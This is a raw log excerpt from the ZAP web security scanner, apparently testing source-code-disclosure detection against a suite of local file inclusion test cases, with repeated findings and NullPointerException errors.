java.lang.NullPointerException 10727814 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10727818 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10727998 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10727999 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10728210 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10728211 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10728533 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10728534 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10728632 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10728633 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10728814 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10728814 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10728815 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10728815 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10729830 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10729922 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10730015 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10730016 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10730537 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10730539 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10731446 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10731447 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10731829 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10731830 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10733220 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10733221 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10733221 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10733222 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10733401 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10733402 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10733403 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10733404 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734041 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734042 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734122 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734123 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734308 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734309 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734322 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734323 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734509 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734510 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10734927 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10734928 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735113 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735114 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735122 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735123 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735322 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735324 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735646 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735648 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735735 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735736 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735915 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735916 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10735927 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10735930 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10736116 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10736118 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10736936 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10736938 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10737122 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10737123 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10737647 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 30%, compared to a threshold of 75% 10737648 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10738751 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10738752 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10739441 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10739442 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10740375 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10740377 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10740392 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10740393 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10740573 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10740575 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10740910 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10740911 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10740988 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10740989 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10741176 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10741177 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10741188 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10741189 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10741372 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10741373 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742208 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742209 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742212 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742213 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742391 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742392 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742516 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742519 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742809 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742811 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10742994 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10742996 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10743997 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10743999 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10744014 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10744015 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10744523 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10744524 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10745421 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10745422 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10746008 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10746009 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10747370 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10747370 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10747377 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10747377 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10747566 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10747567 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10747583 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10747584 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10747973 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10747974 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748171 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748172 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748173 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748173 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748775 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748776 